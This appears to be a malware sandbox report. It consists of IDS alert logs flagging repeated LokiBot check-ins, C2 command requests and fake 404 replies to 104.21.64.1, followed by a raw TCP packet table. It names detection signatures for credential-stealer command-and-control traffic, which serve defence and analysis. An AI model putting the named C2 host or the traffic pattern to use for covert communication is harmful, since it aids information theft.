2025-02-27T23:42:38.103966+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49952	TCP
2025-02-27T23:42:39.269760+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49967	104.21.64.1	80	TCP
2025-02-27T23:42:39.269760+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49967	104.21.64.1	80	TCP
2025-02-27T23:42:39.269760+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49967	104.21.64.1	80	TCP
2025-02-27T23:42:40.042729+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49967	104.21.64.1	80	TCP
2025-02-27T23:42:40.049126+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49967	TCP
2025-02-27T23:42:41.224736+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49982	104.21.64.1	80	TCP
2025-02-27T23:42:41.224736+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49982	104.21.64.1	80	TCP
2025-02-27T23:42:41.224736+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49982	104.21.64.1	80	TCP
2025-02-27T23:42:41.856341+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49982	104.21.64.1	80	TCP
2025-02-27T23:42:41.861447+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49982	TCP
2025-02-27T23:42:43.021533+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49993	104.21.64.1	80	TCP
2025-02-27T23:42:43.021533+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49993	104.21.64.1	80	TCP
2025-02-27T23:42:43.021533+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49993	104.21.64.1	80	TCP
2025-02-27T23:42:43.767205+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49993	104.21.64.1	80	TCP
2025-02-27T23:42:43.772310+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49993	TCP
2025-02-27T23:42:44.950481+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50006	104.21.64.1	80	TCP
2025-02-27T23:42:44.950481+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50006	104.21.64.1	80	TCP
2025-02-27T23:42:44.950481+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50006	104.21.64.1	80	TCP
2025-02-27T23:42:45.743357+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50006	104.21.64.1	80	TCP
2025-02-27T23:42:46.933140+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50020	104.21.64.1	80	TCP
2025-02-27T23:42:46.933140+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50020	104.21.64.1	80	TCP
2025-02-27T23:42:46.933140+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50020	104.21.64.1	80	TCP
2025-02-27T23:42:47.553709+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50020	104.21.64.1	80	TCP
2025-02-27T23:42:47.559067+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50020	TCP
2025-02-27T23:42:48.714574+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50031	104.21.64.1	80	TCP
2025-02-27T23:42:48.714574+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50031	104.21.64.1	80	TCP
2025-02-27T23:42:48.714574+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50031	104.21.64.1	80	TCP
2025-02-27T23:42:49.501980+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50031	104.21.64.1	80	TCP
2025-02-27T23:42:50.665974+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50044	104.21.64.1	80	TCP
2025-02-27T23:42:50.665974+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50044	104.21.64.1	80	TCP
2025-02-27T23:42:50.665974+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50044	104.21.64.1	80	TCP
2025-02-27T23:42:51.442688+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50044	104.21.64.1	80	TCP
2025-02-27T23:42:51.447775+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50044	TCP
2025-02-27T23:42:52.600949+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50052	104.21.64.1	80	TCP
2025-02-27T23:42:52.600949+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50052	104.21.64.1	80	TCP
2025-02-27T23:42:52.600949+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50052	104.21.64.1	80	TCP
2025-02-27T23:42:53.390655+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50052	104.21.64.1	80	TCP
2025-02-27T23:42:53.395831+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50052	TCP
2025-02-27T23:42:54.555374+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-27T23:42:54.555374+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-27T23:42:54.555374+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-27T23:42:55.315764+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-27T23:42:56.506891+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50054	104.21.64.1	80	TCP
2025-02-27T23:42:56.506891+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50054	104.21.64.1	80	TCP
2025-02-27T23:42:56.506891+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50054	104.21.64.1	80	TCP
2025-02-27T23:42:57.248846+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50054	104.21.64.1	80	TCP
2025-02-27T23:42:58.409663+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50055	104.21.64.1	80	TCP
2025-02-27T23:42:58.409663+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50055	104.21.64.1	80	TCP
2025-02-27T23:42:58.409663+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50055	104.21.64.1	80	TCP
2025-02-27T23:42:59.189363+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50055	104.21.64.1	80	TCP
2025-02-27T23:42:59.194583+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50055	TCP
2025-02-27T23:43:00.602248+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-27T23:43:00.602248+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-27T23:43:00.602248+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-27T23:43:01.244051+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-27T23:43:01.249223+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50056	TCP
2025-02-27T23:43:02.418608+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-27T23:43:02.418608+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-27T23:43:02.418608+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-27T23:43:03.138293+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-27T23:43:04.447901+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-27T23:43:04.447901+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-27T23:43:04.447901+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-27T23:43:05.096644+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-27T23:43:05.102064+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50058	TCP
2025-02-27T23:43:06.273683+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-27T23:43:06.273683+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-27T23:43:06.273683+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-27T23:43:07.012698+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-27T23:43:08.180377+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-27T23:43:08.180377+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-27T23:43:08.180377+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-27T23:43:08.907910+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-27T23:43:10.083396+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-27T23:43:10.083396+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-27T23:43:10.083396+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-27T23:43:10.857749+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-27T23:43:10.862859+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50061	TCP
2025-02-27T23:43:12.023349+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-27T23:43:12.023349+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-27T23:43:12.023349+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-27T23:43:12.800249+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-27T23:43:12.805567+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50062	TCP
2025-02-27T23:43:13.982660+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-27T23:43:13.982660+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-27T23:43:13.982660+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-27T23:43:14.728916+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-27T23:43:15.922273+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-27T23:43:15.922273+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-27T23:43:15.922273+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-27T23:43:16.642122+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-27T23:43:17.811982+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-27T23:43:17.811982+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-27T23:43:17.811982+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-27T23:43:18.623939+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-27T23:43:18.629041+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50065	TCP
2025-02-27T23:43:19.826738+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50066	104.21.64.1	80	TCP
2025-02-27T23:43:19.826738+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50066	104.21.64.1	80	TCP
2025-02-27T23:43:19.826738+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50066	104.21.64.1	80	TCP
2025-02-27T23:43:20.626742+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50066	104.21.64.1	80	TCP
2025-02-27T23:43:20.631802+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50066	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 27, 2025 23:41:18.329993963 CET	49731	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:18.335174084 CET	80	49731	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:18.335247040 CET	49731	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:18.343230963 CET	49731	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:18.348207951 CET	80	49731	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:18.348275900 CET	49731	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:18.353266954 CET	80	49731	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:19.121046066 CET	80	49731	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:19.121169090 CET	49731	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:19.121897936 CET	80	49731	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:19.121941090 CET	49731	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:19.126373053 CET	80	49731	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:20.252218008 CET	49732	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:20.257441044 CET	80	49732	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:20.257544041 CET	49732	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:20.259622097 CET	49732	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:20.264585972 CET	80	49732	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:20.264636993 CET	49732	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:20.269663095 CET	80	49732	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:21.009768963 CET	80	49732	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:21.010762930 CET	80	49732	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:21.010828018 CET	49732	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:21.010962963 CET	49732	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:21.015950918 CET	80	49732	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:21.068941116 CET	49733	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:21.074022055 CET	80	49733	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:21.076031923 CET	49733	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:21.077778101 CET	49733	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:21.082756996 CET	80	49733	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:21.084507942 CET	49733	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:21.089579105 CET	80	49733	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:21.862329960 CET	80	49733	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:21.862561941 CET	80	49733	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:21.862695932 CET	49733	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:21.862696886 CET	49733	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:21.867827892 CET	80	49733	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:23.007270098 CET	49734	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:23.012480974 CET	80	49734	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:23.012561083 CET	49734	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:23.015530109 CET	49734	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:23.021001101 CET	80	49734	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:23.021054029 CET	49734	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:23.026508093 CET	80	49734	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:23.787847042 CET	80	49734	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:23.788023949 CET	49734	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:23.789397955 CET	80	49734	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:23.789463997 CET	49734	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:23.793142080 CET	80	49734	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:25.016782999 CET	49735	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:25.168549061 CET	80	49735	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:25.168652058 CET	49735	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:25.170804024 CET	49735	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:25.175786972 CET	80	49735	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:25.175848961 CET	49735	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:25.180824995 CET	80	49735	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:25.922359943 CET	80	49735	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:25.922693968 CET	80	49735	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:25.922693014 CET	49735	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:25.922744036 CET	49735	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:25.927788019 CET	80	49735	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:27.070072889 CET	49736	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:27.075278044 CET	80	49736	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:27.075385094 CET	49736	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:27.078305006 CET	49736	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:27.083319902 CET	80	49736	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:27.083384037 CET	49736	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:27.088404894 CET	80	49736	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:27.811327934 CET	80	49736	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:27.811495066 CET	49736	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:27.813559055 CET	80	49736	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:27.813621998 CET	49736	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:27.816531897 CET	80	49736	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:28.960336924 CET	49737	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:28.965955019 CET	80	49737	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:28.966044903 CET	49737	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:28.969017029 CET	49737	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:28.974353075 CET	80	49737	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:28.974468946 CET	49737	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:28.979567051 CET	80	49737	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:29.728553057 CET	80	49737	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:29.728703976 CET	49737	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:29.729291916 CET	80	49737	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:29.729350090 CET	49737	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:29.733813047 CET	80	49737	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:30.886250019 CET	49738	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:30.891849995 CET	80	49738	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:30.892066002 CET	49738	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:30.894737959 CET	49738	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:30.900688887 CET	80	49738	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:30.900861025 CET	49738	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:30.906574965 CET	80	49738	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:31.687180042 CET	80	49738	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:31.687455893 CET	49738	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:31.687859058 CET	80	49738	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:31.687957048 CET	49738	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:31.692965031 CET	80	49738	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:32.855350971 CET	49741	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:32.860553980 CET	80	49741	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:32.860738993 CET	49741	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:32.862721920 CET	49741	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:32.867815971 CET	80	49741	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:32.867990017 CET	49741	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:32.873202085 CET	80	49741	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:33.644524097 CET	80	49741	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:33.644680023 CET	49741	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:33.645560980 CET	80	49741	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:33.645816088 CET	49741	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:33.649838924 CET	80	49741	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:34.783626080 CET	49745	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:34.788820028 CET	80	49745	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:34.788916111 CET	49745	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:34.790688992 CET	49745	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:34.795785904 CET	80	49745	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:34.795860052 CET	49745	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:34.800909042 CET	80	49745	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:35.538904905 CET	80	49745	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:35.539251089 CET	49745	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:35.539465904 CET	80	49745	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:35.539535046 CET	49745	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:35.544418097 CET	80	49745	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:36.660846949 CET	49747	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:36.666073084 CET	80	49747	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:36.666169882 CET	49747	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:36.667927027 CET	49747	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:36.673003912 CET	80	49747	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:36.673080921 CET	49747	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:36.678150892 CET	80	49747	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:37.418924093 CET	80	49747	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:37.419291019 CET	49747	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:37.419392109 CET	80	49747	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:37.419652939 CET	49747	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:37.424472094 CET	80	49747	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:38.567894936 CET	49748	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:38.575442076 CET	80	49748	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:38.575566053 CET	49748	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:38.577291965 CET	49748	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:38.584575891 CET	80	49748	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:38.584676027 CET	49748	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:38.592086077 CET	80	49748	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:39.461065054 CET	80	49748	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:39.461505890 CET	49748	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:39.462006092 CET	80	49748	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:39.462070942 CET	49748	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:39.466581106 CET	80	49748	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:40.614914894 CET	49749	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:40.620177984 CET	80	49749	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:40.620254040 CET	49749	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:40.623343945 CET	49749	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:40.628367901 CET	80	49749	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:40.628415108 CET	49749	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:40.633389950 CET	80	49749	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:41.340774059 CET	80	49749	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:41.340915918 CET	49749	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:41.341154099 CET	80	49749	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:41.341204882 CET	49749	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:41.345988035 CET	80	49749	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:42.485243082 CET	49750	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:42.490444899 CET	80	49750	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:42.490677118 CET	49750	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:42.492409945 CET	49750	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:42.497433901 CET	80	49750	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:42.497605085 CET	49750	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:42.502657890 CET	80	49750	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:43.301222086 CET	80	49750	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:43.301446915 CET	49750	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:43.302728891 CET	80	49750	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:43.302783966 CET	49750	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:43.306503057 CET	80	49750	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:44.445410013 CET	49751	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:44.450751066 CET	80	49751	104.21.64.1	192.168.2.4
